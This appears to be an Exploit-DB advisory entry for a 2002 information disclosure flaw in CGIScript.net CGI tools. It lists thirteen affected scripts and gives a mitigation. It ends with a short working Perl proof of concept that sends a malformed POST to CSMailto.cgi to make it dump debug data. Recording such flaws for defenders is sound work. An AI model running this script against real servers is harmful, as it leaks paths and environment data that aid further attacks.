CGIScript.net Information Disclosure Vulnerability

vendor:

Various webmaster related tools

by:

Mike Barone and Andy Angrick

7.5

CVSS

HIGH

Information Disclosure Vulnerability

200

CWE

Product Name: Various webmaster related tools

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

CGIScript.net Information Disclosure Vulnerability

Path, form input, and environment variable information is disclosed when a malformed POST request is submitted. This information may aid the attacker in making further attacks against the host.

Mitigation:

Ensure that all POST requests are properly validated and sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4764/info

CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick.

It is possible to cause numerous scripts provided by CGIScript.net to disclose sensitive system information.

The following is a list of cgi scripts that are susceptible to this issue:

csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi

Path, form input, and environment variable information is disclosed when a malformed POST request is submitted. This information may aid the attacker in making further attacks against the host. 

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data

use strict;
use IO::Socket::Inet;

my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';

my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);